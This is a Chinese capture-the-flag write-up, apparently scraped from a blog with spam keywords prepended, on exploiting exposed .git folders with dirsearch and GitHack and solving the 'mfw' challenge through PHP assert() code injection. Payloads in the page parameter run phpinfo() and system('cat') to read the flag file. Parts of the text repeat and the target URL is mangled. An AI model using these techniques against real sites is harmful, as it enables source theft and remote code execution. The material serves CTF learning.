wordpress 邮件验证码,seo西安,专业做网站的团队,个人做哪方面网站Git 源码泄露
开发人员会使用 git 进行版本控制#xff0c;对站点自动部署。但如果配置不当#xff0c;可能会将 .git 文件夹直接部署到线上环境#xff0c;这就引起了 git 泄露漏洞#xff0c;我们可以利用这个漏洞直接获得网页源码。
确定是否存在泄漏
#xff08;1对站点自动部署。但如果配置不当可能会将 .git 文件夹直接部署到线上环境这就引起了 git 泄露漏洞我们可以利用这个漏洞直接获得网页源码。
确定是否存在泄漏
1看看有没有提示使用了 Git如果有就考虑存在。如果没有也可以使用 dirsearch 工具扫描后台如果存在则会扫描出 .git 目录如图所示。 2直接通过网页访问 .git 目录如果能访问就说明存在。 3访问 .git/head 文件如果能下载也能推断存在 Git 源码泄露。
1.【攻防世界】mfw
页面发现git ,可能存在git注入。
用GitHack扫描下载源文件。 知识点 GitHack是一个.git泄露利用脚本通过泄露的.git文件夹下的文件重建还原工程源代码。 渗透测试人员、攻击者可以进一步审计代码挖掘文件上传SQL注射等web安全漏洞。 python GitHack.py http://61:52016/.147.171.105:52016/.git/ ?php if (isset($_GET[page])) { $page $_GET[page]; } else { $page home; } $file templates/ . $page . .php; // I heard .. is dangerous! assert(strpos($file, ..) false) or die(Detected hacking attempt!); //相对于过滤了 .. // TODO: Make this look nice assert(file_exists($file)) or die(That file doesnt exist!); ? 1assert对传入的参数会当作php代码来执行 ?page) or phpinfo();# file_exists(templates/) or phpinfo();#.php ?page).system(cat ./templates/flag.php);// 1双斜杠相当于注释
找到flag。
CTF-WEBGit 源码泄露 - 乌漆WhiteMoon - 博客园 (cnblogs.com)
